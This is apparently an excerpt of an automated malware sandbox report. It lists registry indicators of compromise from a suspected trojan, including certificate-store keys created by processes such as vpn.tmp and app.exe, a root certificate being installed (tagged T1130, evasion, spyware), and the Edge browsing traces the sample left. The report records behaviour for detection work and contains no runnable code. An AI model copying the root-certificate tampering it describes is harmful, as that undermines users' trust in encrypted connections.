Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ww31.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	csrss.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exevpn.tmpMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 96e2b90e4817d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileVersion = "10"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "999"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\consentcdn.cookiebot.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = b0b98d874a17d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "322392340"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\onlinecasinoground.nl\NumberO = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 13f386f84917d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b3f5cf2d4817d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = c0138e8ede2fd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a76c0c234817d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.onlinecasinoground.nl\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32	vpn.tmp
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f7c095f84917d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cdd8a4f34a17d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\multiadblock.com\Total = "1981"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.onlinecasinoground.nl	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1143"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c0a1bb6a4917d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cookiebot.com\NumberOfSubdoma = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "322322570"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = b0a1bddf4817d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\onlinecasinoground.nl\ = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a723c6fc4717d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 9091cd2d4817d701	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 18 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

file.exevpn.tmpapp.exetapinstall.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E	app.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 0f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e2000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35a